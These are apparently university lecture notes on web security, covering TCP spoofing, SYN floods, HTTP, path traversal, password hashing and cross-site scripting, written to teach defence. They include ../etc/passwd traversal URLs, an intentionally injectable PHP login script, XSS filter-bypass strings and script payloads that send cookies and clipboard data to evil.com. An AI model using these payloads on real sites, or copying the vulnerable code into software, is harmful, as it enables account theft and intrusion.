Networking Basics Intro Summary HTTPS is a protocol that is intended to provide secure authentic communication between the browser and the web server. The client knows the identity of (the owner of?) the server it is connected to. A third party cannot eavesdrop on connection between browser and server, nor modify/inject messages between browser and server. It is not necessarily the case that meeting these requirements means that the website is secure. What are we trying to protect? Is information sent to and/or from the webpage critical, ... ? What are threats are we concerned about? Is there a concern that attacker might: eavesdrop on messages, modify/inject messages, compromise the server hosting the website, ... ? An asset is any entity of interest that may be the subject of a threat. The information on my website is an asset. A threat is a potential for violation of security, eg. An attacker masquerades as my website. Denial of Service (DoS) attack on my website. A vulnerability is a flaw or security weakness in an asset that has the potential to be exploited by a threat. TCP/IP and HTTP does not provide authentication. TCP three-way handshake vulnerable to SYN flood, leads to DoS. A countermeasure is an action or process that mitigates vulnerabilities and prevents and/or reduces threats. HTTPS can provide for authentication of websites by browser. SYN-cache, SYN-cookies or firewalls helps prevent SYN flooding. Packets sent across the internet contain ‘headers’ (simplified): Physical Network Transport Application Physical header: data related to physical link (MAC address, etc.). Network header: source and destination IP addresses. Transport header: data related to the connection (ports) and used to help manage faulttolerance (out of sequence packets, etc.). Application data of the application that is running over the connection. HTTP is a stateless protocol: at the server-side the protocol keeps no record of past/current client interactions. If state is required then the server (web) application and/or the client application must manage this information. 1 Three-way handshake to establish a TCP connection: Msg 1 Source → Destination : SYN(x) Msg 2 Destination → Source : SYN(y), ACK(x + 1) Msg 3 Source → Destination : ACK(y + 1) TCP/IP Spoofing I In IPV4 there is no authentication of the IP addresses/network data. Attacker first initiates a legitimate connection and observes the current server sequence number from Server. Msgα1 Attacker → Server : SYN(x) Msgα2 Server → Attacker : SYN(y), ACK(x + 1) Msgα3 Attacker → Server : ACK(y + 1) Attacker immediately initiates another connection with server, masquerading as a nonexistent/spoofed IP number A . Msgβ1 A[Attacker] → Server : SYN(x′) Msgβ2 Server → A : SYN(y′), ACK(x′ + 1) Msgβ3 A[Attacker] → Server : ACK(y′ + 1) The server ACK (and y′) may be lost (not delivered to attacker), but the attacker can predict the value of y′ based on their previous connection and establish the connection TCP/IP Spoofing II If connected, the legitimate owner of the spoofed address may respond by terminating a connection it did not initiate: Msgβ1 A[Attacker] → Server SYN(x) Msgβ2 Server → A SYN(y), ACK(x + 1) Msgβ3 A[Attacker] → Server ACK(y + 1) Msgβ3 A → Server RST The attacker must either use a non-existent IP address or ensure that the legitimate owner cannot respond. The latter is done by either breaking/blocking A’s connection or syn-flooding A. TCP/IP does not provide (strong) authentication of host. SYN-Flooding There’s a limit on number of concurrent ‘half-open’ TCP connections per port. When limit is reached, TCP discards all new incoming connection requests. Limit varies. Half-open connections time-out (after around 75 seconds). The attack: 2 Attacker floods destination server with opening messages, flooding available connections and denying valid connections. Attacker makes sure that SYNs are sent faster than half-open connections expire. IP numbers are non-existent/randomly generated. Source of attack not apparent since IP address is spoofed. Distributed Denial of Service (DDOS): attacker uses a large number of compromised systems (zombies) to carry out a distributed version of above. Avoiding SYN Flooding Attacks Reduce the timeout period to a short time, eg 10 seconds to make it harder to maintain the attack window; may deny legitimate access. Increase the number of half-open connections allowed. Increases resource requirements Disable non-essential services in order to reduce the number of ports that can be attacked. Synkill is an active monitor that inspects packet source IP address against good/bad lists of IP addresses. Behaviour during 3-way handshake influences list membership. Use a firewall (in between public network and server) to throttle the number of packets permitted. Use SYN-cache, SYN-cookies. TCP/IP Vulnerabilities: some other attacks Sniping Attacker gets sequence numbers from packets and sends an RST packet to close connection. Hijacking Attacker snipes one end of a connection and takes over talking to the other side. Packet Sniffing Read contents of packet (eg user id/password) Echo Service (Port 7) Send packet to target IP spoofed from same IP; host may spend all its resources in a loop echoing itself (fixed in most implementations). DNS Spoofing Typically weak authentication between name servers: convince local name server that a domain name points to some IP address Probing Attempt connection to target host/port; RST reply means port is closed, probably. Target may log the probe. As above, but attacker does not reply with a SYN/ACK; less likely that target will log your probe. FIN scanning. Send a FIN packet; if port is closed then target sends a RST. If open then target drops FIN. Less likely to be logged. HTTP Basics HTTP Basics Paros is used to trap/examine/etc HTTP traffic to/from mybrowser. Paros operates as a HTTP proxy used by the browser ie. All HTTP traffic between the web-server and the browser goes through the Paros proxy. 3 HTTP Request The first line of every HTTP request has three items, separated by spaces: Verb indicating the HTTP method (GET most common). Requested URL, with optional query string containing parameters indicated by ‘?’. HTTP version being used (typically 1.0/1.1). Other information in the request: Referrer header indicates URL from which the request originated. User-Agent header provides information about browser, etc. Host header specifies hostname that appeared in the full URL (necessary for virtually hosted websites). Cookie some ‘state’ that was stored by server on client during previous visit. Not much privacy in the HTTP Request A HTTP request gives away information about your host, operating system and browser configuration. The Firefox plugin BrowserMasquerade can be used to block/modify some of the information sent in a HTTP request. The referrer header contains the URL of the web page from which the request originated. Some websites use this to make sure that a request originated from one of their own pages, for example to make sure that visitors go through the ‘front door’ web-page of their website. However, since the referrer header is generate by the browser the user can easily change the referrer (eg. Using BrowserMasquerade)to appear as if the user came via the front door. HTTP Response The first line of every HTTP response consists of three items, separated by spaces: HTTP version used Numeric status code indicating result of request. 200 (most common) means the request was successful and the requested resource will follow. A textual reason phrase further describing response status. Other headers include: Information about the Server software. A cookie to be set in the browser (if Set-Cookie present). The Pragma header if present instructs browser not to store response in its cache. The Connection header in this case indicates that the connection will be closed after completion of the response (non-persistent). Server Information Disclosure A HTTP response may disclose information about the underlying system, web-server etc. 4 Disclosed web-server information may be useful to an attacker. For example, Apache/1.3.37 (unix) is an old version of Apache and is vulnerable to a buffer-overflow attack, which means that a ‘visitor’ to the website can get the Apache application to execute an arbitrary piece of code on its server and thus gain control of the server. Knowing the version of the software makes this easier for the attacker. Configure the web-server so that it reveals as little information as possible about the server configuration. For Apache, the configuration file httpd.conf has as default ServerTokens set to Full. HTTP Response Remember that Web-pages are hypertext and the material that you see on the page may be composed of hypertext originating from a number of different sources/hosts. Consider HTML (deprecated) <meta http-equiv="Refresh" content="0; url=’http://www.ucc.ie/en/’"> The response above causes a re-direct/the browser to issue a further GET www.ucc.ie/en to the server, and the response can result in GETs to further URLs, and so forth. Note that using a refresh meta-tag for URL redirection is discouraged by the W3C “[...] Developers cannot predict how much time a user will require to read a page; premature refresh can disorient users. Content developers should avoid periodic refresh and allow users to choose when they want the latest information. [...] ” Should use a manual re-direct, a 3xx redirect response or Javascript. Safe Requests Get HTTP Method The get method can be used to send parameters to the requested source in the URL string. For example, a search for “php-security” on amazon.co.uk: GET http://www.amazon.co.uk/s/?field-keywords=%22php%20security%22 HTTP/1. Host: www.amazon.co.uk An advantage of using GET parameters is that the document can be bookmarked. However, they are also stored in logs, in the browser history and included in the Referrer header when following a link. Also, early browsers did not encrypt the URL when running HTTPS. GET parameters should not be used to transmit sensitive data. A website foobar.com uses the following form for user login webpage. <form method="GET" action="/foobar.com/login.php"> <p> Username <input type="text" name="username"></p> 5 <p> Password <input type="text" name="password"></p> <p><input type="submit"></p> </form> If I enter my name and password then I arrive at the URL foobar.com/login.php?username=simon&password=mypass This URL can be bookmarked/stored in browser history and could beaccessed by anyone who has access to my browser. It is not necessary to use this HTML form to login. Suppose that upon authentication the HTML response included a linkto another webpage/site. In that case, the name and password will beincluded in the Referrer header when the user clicks on that link. POST HTTP Request The post method is designed for performing actions. Request parameters can be sent in the body of the message. For example, the user homer logs into the Department’s moodle website with his password simpson. Username=homer&password=simpson Upon authenticating, he arrives at http://csa6.ucc.ie/moodle/: in this case his username and password are not included in the URL and it can be safely bookmarked, stored in history, etc. Note: the username and password are still visible to anyone eavesdropping on the HTTP connection. Hidden Elements in Forms Used to transmit data via client in superficially an unmodifiable way. For example, suppose that during authentication a user is identified as either a student or regular customer by the foobar.com website and this information is encoded using hidden elements in subsequent webpages visited by the customer. Student customers get a 20% discount when they use the order.php application. Suppose that Alice, a regular/non-student customer authenticates and is presented with the following form. <form method="GET" action="foobar.com/order.php"> <p> ItemID <input type="text" name="itemID"></p> <p> Quantity <input type="text" name="quantity"></p> <input type="hidden" name="kind" value="regular"> <p><input type="submit"></p> </form> 6 Using this form Alice can ‘see’ only fields ItemID, Quantity and the submit button and should not get the 20% discount. However, Alice can see the parameters in the URL and can bypass the form and the intended controls by entering the URL directly http://foobar.com/order.php?itemID="1234"&quantity="8"&kind="student" Changing the request method to POST does not avoid this problem since Alice can still bypass the form/controls by generating the POST request directly/outside of the Browser. Uploading To Safe Locations Uploaded files may contain malicious programs or data and one needs to be sure that they cannot end up in a directory where they could be misinterpreted. Allowing an uploaded file to end up in a sub-directory of the document root (eg, /Applications/MAMP/htdocs) that happens to be executable means that it may be possible for a malicious user to upload a php program to the server which they then execute by visiting the URL. Path Traversal Attack Intention is that files with user-proposed names such as myfile are safely quarantined in a directory, as /Applications/MAMP/private/myfile that is well away from system files and is not under the document root. However, the php server code does carry out any check on the validity of the filename proposed by the user. Suppose that malicious user proposed fileName="../htdocs/order.php" Then the value of $new filename is /Applications/MAMP/private/../htdocs/order.php = /Applications/MAMP/htdocs/order.php If order.php already exists in the document root then the malicious user has managed to overwrite it with his own file! We can use ”dot-dot-slash” path traversals to set up any target file. Suppose instead that the user proposed fileName=../../../etc/passwd This is the path (on my server) for /etc/passwd where user passwords may be stored. 7 In a windows system an attacker can navigate only in a partition that locates web root. In the Linux the attacker may be able to navigate in the whole disk Filtering Path Information ina Filename Could check for ‘‘../’’, etc., in user supplied data, but don’t forget that traversals can also be expressed in a string as %2e%2e%2f. A determined attacker can choose a different text encoding. For example, %u002e (16 bit unicode encoding of “.”), etc. These should also be checked, as should the directory separator ‘\’ used by windows. Safer approach is to use function basename() to return just the filename without path information: $new_filename if (basename($_POST[’filename’]) == $_POST[’filename’]){ $new_filename= ’/Applications/MAMP/private/’.$_POST[’filename’] ... Could alternatively use realpath() which reduces the path to its simplest form and then check that the resulting path is acceptable to the server. Path Traversal in General The path traversal attacks are not limited to the file upload scenario. It may occur anytime data from a client forms part of a filename/path at the server side. For example, an application uses a dynamic page to return static images to the client with the name of the image specified in a query string parameter. http://foobar.com/productImage.php?file=widget.jpg Attacker uses path traversal sequence to attempt to access another file: http://foobar.com/productImage.php?file=../../../etc/passwd This attack can be avoided if the server filters the filename provided. Past Path Traversal Attacks On some older web-servers it was possible to carry out a path traversal attack on the URL itself and to break out of the document root. A web-server should block an attempt to visit the URL http://foobar.com/../../../etc/password and keep the visitor within the document root. 8 Filtering Path Information in a Filename Could check for ‘‘../’’, etc., in user supplied data, but don’t forget that traversals can also be expressed in a string as %2e%2e%2f. A determined attacker can choose a different text encoding. For example, %u002e (16 bit unicode encoding of “.”), etc. These should also be checked, as should the directory separator ‘\’ used by windows. A safer approach is to use function basename() to return just the filename without path information: $new_filename if (basename($_POST[’filename’]) == $_POST[’filename’]) { $new_filename= ’/Applications/MAMP/private/’.$_POST[’filename’] ... Could alternatively use realpath() which reduces the path to its simplest form and then check that the resulting path is acceptable to the server. Path Traversal, in General The path traversal attacks are not limited to the file upload scenario. It may occur anytime data from a client forms part of a filename/path at the server side. For example, an application uses a dynamic page to return static images to the client with the name of the image specified in a query string parameter. http://foobar.com/productImage.php?file=widget.jpg Attacker uses path traversal sequence to attempt to access another file: http://foobar.com/productImage.php?file=../../../etc/passwd This attack can be avoided if the server filters the filename provided. Past Path Traversal Attacks On some older web-servers it was possible to carry out a path traversal attack on the URL itself and to break out of the document root. A web-server should block an attempt to visit the URL http://foobar.com/../../../etc/password and keep the visitor within the document root. Client Side Conclusions As the visitor to a website you should be aware of and be comfortable with the data that is being sent to the website. HTTP request can send quite a bit of detail about your system. This may violate your privacy and/or reveal information about security vulnerabilities of your system. 9 Sensitive data in URL may persist in the browser history, logs, subsequent requests (referer), etc. You may not want to trust the website owner with your data (sensitive or otherwise). You can use tools such as BrowserMasquerade to mask part of the information transmitted in the request. However, it is up to your own judgement to decide whether it is safe to visit a particular website. Keep your browser, server, etc. software up to date and reveal as little information as possible. As a website owner/designer you should not rely on client-controls at the browser side to enforce security of your application. Don’t assume that every request from a client comes via your forms. Don’t make decisions using hidden data in forms. Don’t make decisions using disabled data in forms. Don’t necessarily believe the headers from the client. When uploading files remember that they may contain malicious code/data and be careful where and how they are accessed and stored. The server applications must filter and check all input data! Authentication User Authentication A security policy is typically defined in terms of the users of the system. An authentication mechanism is needed to counter one user masquerading as another. An authentication mechanism requires a user to prove that they are who they claim to be. This proof can come from: What the user knows e.g. passwords, pins What the user has e.g. a key, a badge What the user is e.g. fingerprint, retinal characteristics Where the user is e.g. at a particular terminal Some Authentication Threats Password guessing: Shoulder surfing, eavesdropping on network traffic. Inconvenience: hard to remember, have to carry authentication tokens, using same password for different accounts. Denial of Service: attacker behaviour (attempting to masquerade as target) results in account being locked out. Social Engineering: phishing. Physical keystroke loggers, login-spoof, Trojan Horse program, pharming (redirecting website traffic to a bogus website). 10 HTTP Request with Basic Authentication Information If the user attempts to visit a URL that requires authentication (without providing username/password) then the response is: HTTP/1.1 401 Authorization Required Date: Fri, 08 Oct 2010 08:02:04 GMT Server: Apache WWW-Authenticate: Basic realm="EnterPassword" Content-Length: 460 Content-Type: text/html; charset=iso-8859-1 This instructs the browser to request a username/password. The username and password is passed in a header in the HTTP request: GET http://localhost/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Authorization: Basic aG9tZXI6c2ltcHNvbg== User-Agent: Paros/3.2.13 This is not Particularly Secure The authentication header provides the username and password encoded using Base64. For example, the string homer is converted to aG9tZXI, in Base64. In the example above, the Base64 encoding of the username and password is sent from the browser to the server as plaintext over the HTTP protocol. This means that a malicious user who can eavesdrop on this connection can discover the encoded username and password and simply decode using Base64 and then masquerade as the user. This basic HTTP authentication is adequate as weak form of authentication. However, if stronger authentication is required then the connection should at least be made to the server over a secure channel using HTTPS (which we will look at later). Configuring the Web Server for HTTP Authentication The web-server file .htacess is used to specify who may access documents under the directory that includes this file .htaccess. For example, placing the following .htaccess in my directory /Applications/MAMP/htdocs/lab01 means that only authenticated user homer may access documents in this directory. AuthUserFile /Applications/MAMP/private/.htpasswd 11 AuthGroupFile /dev/null AuthName EnterPassword AuthType Basic require user homer The .htpasswd file specifies the user’s password. homer:j7IaPh9DCn/Wg The password is given in an ‘encrypted’ form (one-way hash) so that anyone who manages to read the .htpasswd file cannot determine homer’s password. However, just to be safe (defense in depth) we should not store the .htpasswd file in the web document path. Aside. In *nix, you can use the shell command htpasswd to ‘encrypt’ a password. For example, htpasswd -nb homer doh! generates the entry homer:jMbnDzxStXI9E. Other Types of HTTP Authentication HTTP also supports challenge-response based authentication. The browser proves that it knows the password to the server without having to reveal it. Msg1 : Browser ! Server : hello Msg2 : Server ! Browser : challenge N Msg3 : Browser ! Server : response h(N : username : password) where h() is a special form of encryption (one-way hash function). So long as the server generates a different challenge for every authentication attack then an eavesdropper listening in on the exchange cannot discover the password (requires breaking the encryption) nor can it carry out a replay attack since every authentication exchange is different. HTTP provides NTLM and Digest as challenge-response protocols. However, due to a number of factors, these protocols are not much more effective than Basic. In practice, complex web-applications implement their own authentication mechanisms. Authenticating with Digest A user attempts to visit a website which is configured to use challenge-response authentication. The response is: HTTP/1.1 401 Authorization Required Date: Fri, 08 Oct 2010 09:14:18 GMT Server: Apache WWW-Authenticate: Digest realm="EnterPassword", nonce="gXpwbxeSBAA=4d0a4e5c20fa710a5cd920170b521f5141503755", algorithm=MD5, qop="auth" Content-Length: 460 Content-Type: text/html; charset=iso-8859-1 The browser obtains the user-id and password from the user and this is the response. 12 GET http://localhost/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Authorization: Digest username="homer", realm="EnterPassword", nonce="gXpwbxeSBAA=4d0a4e5c20fa710a5cd920170b521f5141503755", uri="/", algorithm=MD5, response="43cf12bd3f8ae897174783e9d6e9dfea", qop=auth, nc=00000001, cnonce="6730aae57c007a05" User-Agent: Paros/3.2.13 Group Based Access Control Policies You can organize the users who may access the website/page according to groups and then allow access based on these groups. AuthUserFile /Applications/MAMP/private/.htpasswd AuthGroupFile /Applications/MAMP/private/.htgroup AuthName EnterPassword AuthType Basic require group cs3511 and the .htgroup file defines the groups. cs3511: homer monty bart Assuming that the passwords for these users are in the .htpasswd file. Blocking Access Based on IP You can block access to your website/page by specifying access controls by IP address. For example, block access from 123.45.6.7 and from the system csa.cit.ie. order allow,deny deny from 123.45.6.7 deny from csa.cit.ie allow from all Using an IP address is a weak form of access control since it is possible for the visiting system to spoof its IP address. A Simple Web Login Mechanism Suppose that only registered users are permitted access to the foobar.com website. In order to login (be authenticated) a user must provide a user name and password to the login form at foobar.com/login.html The following is a (poor) example of how this authentication might be implemented at the server. A database table contains the names of authorized users and their corresponding passwords. The login script checks whether the provided username/password appear in the table. 13 A session to the main website page is created for an authenticated user. The Database Table CREATE TABLE passwordTable ( ‘username‘ varchar(8) NOT NULL, ‘password‘ varchar(8) NOT NULL, PRIMARY KEY (‘username‘) ); Note that specifying username as primary key ensures that it is not possible to have two users with the same name. The Login Form <form action="http://foobar.com/login.php" method="POST"> <p> Username: <input type="text" name="myusername" /></p> <p> Password: <input type="password" name="mypassword" /></p> <p> <input type="submit" /></p> </form> Note that input type="password" prevents a shoulder-surfing attack bydisplaying each typed password character as •. The request is sent via HTTP and the userid and password are sent asplaintext and could be discovered by a attacker eavesdropping on the connection. The Login Script: Connecting To The Database <?php $host="localhost"; // Host name $user="..."; // Mysql username $password="..."; // Mysql password $dbname="CS3511"; // Database name $tbl_name="passwordTable"; // Table name $dbconnection = mysql_connect( $host, $user, $password ); if ( ! $dbconnection ) { output_problem_page(); die(); } // Try to select database $dbselection = mysql_select_db( $dbname ); if ( ! $dbselection ) { output_problem_page(); die(); } ?> The Login Script: Continued, Check Username / Password // DANGER: these **should** be filtered, among other things... $myusername=$_POST[’myusername’]; $mypassword=$_POST[’mypassword’]; 14 $sql="SELECT * FROM $tbl_name WHERE username=’$myusername’ and password=’$mypassword’"; $result=mysql_query($sql); $count=mysql_num_rows($result) if($count==1){ session_start(); header("location:main_page.php"); } else { echo "Wrong Username or Password"; } (we’ll look at how to correctly filter the input and set up the session later) Attacking the Login Script Password Guessing. A malicious user could try ‘likely’ passwords for a given user. This assumes that the attacker knows a valid username. On failure, script should not reveal whether or not username is valid. Dictionary Attack. A malicious user could write an attacking script that tries all possible words from a dictionary as the password for a given user. Passwords should not be words from a dictionary. Brute Force Attack. A malicious user could write an attacking script that tries all possible 8-character strings as passwords. This is a large number of tests that may be impractical over a network; however, the malicious user could reduce the search space by trying, for example, just lowercase letters. User should be required to pick long passwords that are a mix of upper/lower case letters, digits, etc. A simple throttling mechanism could be added to the code whereby a login attempt fails if it made within 15 seconds (for example) of a previous failure. Protecting Stored Passwords The web-server stores the username/password pairs in the database table passwordTable. This means that anyone (eg, administrator) who has access to the database can lookup a user’s password. This is not considered good practice. The administrator of the web-site may be able deduce (same?) the passwords you use on other web-sites for which the administrator has no authority. If the web-site is compromised then an attacker will be able to discover user passwords. Remember the principle of least privilege. We would like some way to be able to avoid storing the password while at the same time being able to test whether a user-supplied password is valid. We will use a cryptographic one-way hash function. 15 One Way Hash Function A function h maps arbitrary length value x to fixed length value y such that: Hard to reverse. Given value y not feasible to find x with y = h(x). Collision freeness. Hard to find values x, x′ such that h(x) = h(x′). Unpredictability. The hash value h(x) does not give any information about any part of its operand x. Protecting the Password Database Using One-Way Hash Function Rather than store a user password as cleartext in the database table we store the one-way hash of the password. An attacker who obtains a copy of the database table will not be able to determine the password, as doing so would mean reversing a one-way hash function When checking a submitted password, the login.php script simply hashes the password provided and checks that against the database. ... $myusername=$_POST[’myusername’]; $mypassword=sha1($_POST[’mypassword’]); $sql="SELECT * FROM $tbl_name WHERE username=’$myusername’ and password=’$mypassword’"; $result=mysql_query($sql); ... Finding Passwords from Hash Functions If the attacker has managed to obtain a copy of the (hashed) password database then how might s/he figure out a user’s password? Recall the property: Collision freeness. Hard to find values x, x′ such that h(x) = h(x′). (We’ll see later that this is very important for digital signatures.) If I have a specific x and h(x) and I’m searching for another y such that h(y) = h(x) then the effort required will be about 2n for an n bit hash value. However, if I don’t care about what values x and y are found that have the relationship h(x) = h(y) then we have a good chance of finding some pair 2n/2 due to the Birthday Paradox. 16 For example, we have good chance of finding a pair of messages m and m′ such that md5(m) = md5(m′) with just 264 tests, making it vulnerable to brute-force attack. However, MD5 suffers a serious design flaw which means a collision can be found within 28 operations and recently collisions were found in SHA1 in 263 operations. Currently, SHA256 and SHA512 are considered safe. Pre-computation Dictionary Attack on the (Hashed) Password Table Attacker builds table of dictionary words and corresponding hash values. password aardvark boy ...... hash(password) $1$ac23b37db0039dda62896bb21f312755 $1$653805544e622bacc4cc028613a1358a Attacker merges (join) this table against passwordTable in hope of matching a poorly chosen password. The cost of storing and building a dictionary table is small and the attacker can use multiple dictionaries. Use dictionaries for different languages, Klingon, lines from songs, etc. The attacker can also find users with the same password. This dictionary attack is an example of a pre-computation attack: most of the effort goes into building the dictionary, while the seach/merge is relatively cheap and the dictionary can be re-used. Using Salt to Defend Against Dictionary Attacks Strategy: make it impractical to build a dictionary table. When a password is chosen by the user, a random salt value is generated and hashed with the password. The password table stores the username, the chosen salt and a hash of the salt and password. If the salt is large then building the dictionary table beomes costly. word aardvark aardvark .. boy boy .. salt 0 1 .. 0 1 .. h(saltˆword) $1$29b43ef4c7e4b84ff9f25ea158f46818 $1$263818db1dc48169633a51e04fa0bf98 ..... $1$fc0f90e9b32b460b569c6d27291bc3ba $1$ef90e3e32b460b569c6d2723234aeba ........ Authenticating with HTTP For HTTP authentication the web-server stores a list of userid/passwords. The hash of the password is stored so that an attacker cannot discover a user’s password from the .htpasswd file. 17 The htpasswd tool can be used to generate the correct userid/salt/hashed password entry for Basic HTTP authentication. This generates a random salt value and the htpasswd entry for the given userid and password: userid : salt.md5(salt.password) When a user authenticates under HTTP Basic authentication then the web-server retrieves the user’s entry in the password file, obtains the salt, re-computes md5(salt.password) given the password passed from the browser and compares the result with the stored hash. If Digest HTTP authentication is used then the user/password must be stored differently since the web-server needs to ‘know’ the user’s password in order to check the validity of the user’s response. The htdigest tool can be used to generate the entry for the password file in this case. One Way Hash Function in PHP One way hash functions are also called Message Digests. PHP provides function that implement md5 (V.4 onwards) and sha1 (V.4.3 onwards). When a user first picks a password, a random salt should be generated and the hash of the salt and password stored in the password database. ... $mypassword=$_POST[mypassword]; $salt= openssl_random_pseudo_bytes(2,True); $hpasswd= $sha1($salt.$password); //store the userid, hpassword *and* the salt This uses a secure random (True) salt string of length 2. When the user logs in, the login script looks up the user’s salt, recomputes the hashed salted password and compares the result against the stored value $hpasswd. Cross Site Scripting Introduction Cross site scripting (XSS) is one of the best known types of web attacks. XSS results in the insertion of malicious (JavaScript) code into a web-page that the user trusts. The user unknowingly accesses the page and executes the script which could cause credentials and cookies to be stolen, key logging, Denial of Service . . . XSS is the most prevalent web-vulnerability, appearing in around 70% of all websites and accounting for around 20% of Common Vulnerabilities and Exposures vulnerabilities. JavaScript Security A JavaScript program downloaded in the browser from a web-page executes in a Java-like ‘sand-box’ that limits the local system resources that it may access. JavaScript’s same-origin security policy prevents scripts loaded from one origin (Web site) from getting or setting properties of a document loaded from a different origin. This policy prevents 18 hostile code from one origin from taking over or manipulating documents from another. More precisely, an origin is identified by domain, port and application protocol. Without this policy, JavaScript from a hostile site could do any number of undesirable things such as snoop keypresses while you’re logging in to a site in a different window, wait for you to go to your online banking site and insert spurious transactions, steal login cookies from other domains, etc. Suppose that when Bob visits the website www.evil.com, the response includes the JavaScript <p><script>alert(’Code from Alice’);</script></p> Bob’s browser executes the script as it obeys the same-origin policy. Bob visits www.ucc.ie and a new browser window pops up (JavaScript also originates from www.ucc.ie). var w = window.open(http://www.ucc.ie); // Wait a while, hoping they’ll start using the newly opened window. // After 10 seconds, let’s try to see what URL they’re looking at! var snoopedURL; setTimeout("snoopedURL = w.location.href()", 10 * 1000); Bob’s browser executes the script as it obeys the same-origin policy. However, suppose that this script was loaded from www.evil.com, then the w.location.href would fail/be blocked by the browser as it references a different document origin. Many of the variables that can be accessed by a JavaScript program are relative to the current document. For example, the following script sends any cookies related to the current document to the site www.evil.com. <script> document.location = ’http://www.evil.com/steal.php?cookies=’ + document.cookie </script> If the page www.evil.com embedded this JavaScript then it will send any cookies related to this document/website to itself. If Alice’s web-site foo.bar embedded this JavaScript, then when Bob visits her site the program sends his cookies to www.evil.com. In principle this is not an issue since its Alice’s decision to include this code on her website and in visiting Alice’s web-page, Bob presumably trusts Alice’s intentions.... XSS Example, the Vulnerability Alice’s web application allows users to enter comments on a web-page. The following form is used. <form action="comment.php" method="post" /> <p>Name: <input type="text" name="name" /><br /> Comment: <textarea name ="comment" rows="10" cols="60"></textarea><br /> <input type="submit" value="Add Comment" /></p> </form> 19 The application displays comments to other users who visit the page. Suppose that the comment-viewing application (web-page) includes the following code to output a single $comment and corresponding $name. <? php echo "<p>$name writes:<br />"; echo "<blockquote>$comment</blockquote>"; ?> XSS Example, Exploiting the Vulnerability A malicious user of this application can embed any html within their name and comment (request) and this html will form part of the application response to another user reading the comments. For example, Malicious Mike’s request includes: $name=Mike $comment=<p><script>alert(’Code from Alice’);</script></p> When Bob reads Mike’s comment, the server response includes the HTML Mike writes:<br /> <blockquote><p><script>alert(’Code from Alice’);</script></p> </blockquote> and a pop-up message appears on Bob’s screen! This is an example of a fairly benign attack. However, suppose that malicious Mike makes a request to comment.php that includes (in $comment) <script> document.location = ’http://evil.com/steal.php?cookies=’ + document.cookie </script> Now, when Bob views Mike’s comment on Alice’s web site, Bob’s cookies (for Alice’s webapplication/site) are sent to evil.com. This attack occurs because malicious Mike manages to embed his own malicious code in the HTML response from Alice to Bob. XSS Attack Payloads The above example demonstrates cookie-stealing code as XSS payload (session hijacking). Other kinds of payload include the following. Virtual Defacement that does not modify the underlying server-data but interferes with the way that it is rendered on a web-page. Trojan Horse. Injected XSS code adds new functionality to web-site. For example, asking the user for credit-card details, etc. Masquerading user. The JavaScript code performs some action (eg administrative) as the user. JavaScript that directly attacks the user. For example, other applications may use the clipboard but not clear it after use. Steal clipboard data with 20 ’http://evil.com/steal.php?clip=’+window.clipboard.getData(’Text’); (of course, this attack is not limited to just XSS) Detecting XSS Vulnerabilities A simple strategy for testing for XSS vulnerability is to use attack string: "><script>alert(document.cookie)</script> which should be submitted as every parameter to every page of an application and responses monitored. Some applications use simple blacklist filters that look for <script> strings within request parameters and remove, encode or block the request. They might not detect all possible configurations of a script call: "><script>alert(document.cookie)</script> "><ScRiPt> alert(document.cookie)</ScRiPt> "%3e%3csript%3ealert(document.cookie)%3c/script%3e ... Simply checking for <script>, etc., may be problematic if the response already includes <script>: the attacker may be able to inject their own code within this response. For example, the php code may include echo "<script>var a=’$myParameter’; .... </script>" and the attacker simply terminates the single quotation marks around $myParameter and injects their own code into the request $myParameter= ’ \’; alert(document.cookie); ’ and the resulting response looks like <script>var a=’ ’; alert(document.cookie); .... </script> Avoiding XSS XSS occurs as a result of a poorly implemented Web-application not properly filtering and cleaning its input/output data. Avoid XSS by Disable scripting in the browser. Educate users. Validate input. Filter output. Encode properly. Avoiding XSS in PHP You should at least use htmlentities() to escape any data that you send to the client. This function converts all special characters into their HTML entity equivalents. Any character that the browser interprets in a special way is converted to its HTML entity so that its original value is preserved. $cleanName=htmlentities($name, ENT_QUOTES, ’UTF-8’); $cleanComment=htmlentities($comment, ENT_QUOTES, ’UTF-8’); echo "<p>$cleanName writes:<br />"; echo "<blockquote>$cleanComment</blockquote>"; 21 This converts: & to &amp; ’’ (double quote) to &quot; ’ (single quote) to &#039; < (less than) to &lt, and > (greater than) becomes &gt. Use html entity decode() to retrieve original string, if needed. Reflected XSS The XSS attacks in the slides above are called persistent XSS attacks whereby attacker manages to embed Javascript into your site’s database. A reflective XSS attack occurs when the attacker embeds JavaScript into a link to your site and tricks a user in to following it. http://www.facebook.com/srch.php?nm=xss%00<script>alert(’XSS’)</script> http://www.youtube.com/edit_playlist_info?p=’%22%3E%3Cscript%20src=http://ck ers.org/s%3E http://groups.google.com/group/rec.sport.prowrestling/browse_thread/thread/1ab38554971acfc9’)&+eval(alert(document.cooki e))&+eval(’?tvc=2 http://search.live.com/images/results.aspx?q=1&rst=21&FORM=PEIR"><script>alert (’securitylab.ru’)<script> (All from http://xssed.com/) Detecting XSS in the Browser In principle, it is a good idea to disable scripts in the browser and use a plugin such as NoScript to selectively enable scripts for ‘trusted sites’. Simple reflective XSS attacks are relatively easy to detect in the browser. For example, MS Internet Explorer8 and the Firefox plugin NoScript blocks reflective XSS attacks. Of course, these just provide defense in depth for the client and do not ‘protect’ the server. Conclusions A cross site scripting vulnerability provides an attacker with a way to bypass JavaScript’s same-origin security policy. You should filter and clean all input data to a web application and check that it is as expected. Web applications should also escape everything on output and only un-escape stuff that you know is safe and that you know contains markup you want to execute. Developer should test web-application for XSS by injecting attack strings (automated tools available). Browser controls provide useful defense-in-depth/additional check for users but do not make the web-application any more secure. Using HTTPOnly Header in HTTP Response If the HttpOnly flag in the HTTP response header is set then the cookie cannot be accessed through a client side script (if the browser supports this flag). As a result, even if a XSS flaw exists, and a user accesses a link that exploits this flaw, the browser will not reveal the cookie to a third party. 22 If a browser does not support HttpOnly and a website attempts to set anHttpOnly cookie, the HttpOnly flag will be ignored by the browser, thus creating a traditional, script accessible cookie. This header can be set in PHP as default in php.ini using session.cookie httponly, or programatically by setting parameter http-only to TRUE: 